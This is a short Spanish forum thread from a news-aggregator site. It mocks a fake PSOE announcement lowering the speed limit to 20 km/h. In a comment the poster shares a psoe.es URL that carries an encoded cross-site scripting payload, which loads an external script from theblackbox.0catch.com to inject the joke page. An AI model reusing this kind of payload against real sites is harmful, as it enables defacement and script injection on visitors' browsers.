Hace 13 años | Por Koliko_Nefritik... a psoe.es
Publicado hace 13 años por Koliko_Nefritiko a psoe.es

El gobierno finalmente ha prohibido utilizar cualquier medio de transporte que supere los 20km/h. Tras el fracaso en la reunión con los ciclistas, celebrada la semana pasada en la casa del árbol de la ministra Chacón, se han acelerado los trámites para que los ciudadanos puedan gozar de las ventajas que la nueva ley trae consigo.

Comentarios

D

No enlaza a nada.
Además, si es humor y está en la categoría humor, por qué narices tienes que repetirlo en el título.

editado:
pa qué coño la envías para descartarla lol

Koliko_Nefritiko

#1 es que he tenido problemas... como bien dices no enlaza a nada, no sé como lo han hecho, la cuestión es que el enlace es el siguiente (pero al ponerlo en la noticia me sale el original):

http://www.psoe.es/ambito/saladeprensa/tofriend.do?title=el-psoe-reduce-mas-la-velocidad-maxima&id=549166/*%22%3E%3Cscript%20charset=%22utf-8%22%20src=%22http://theblackbox.0catch.com/psoe.js%22%3E%3C/script%3E*/

Que quieres que te diga, me he reido un rato. Pero al introducir ese enlace en la noticia, se me ha cambiado automaticamente al que enlaca la noticia
Pero bueno, mis risas para mi se quedan

D

#2 Tiene una url muy rara, con scripts que no entiendo. Pregunta en el nótame, aunque a estas horas puede que no recibas mucha ayuda.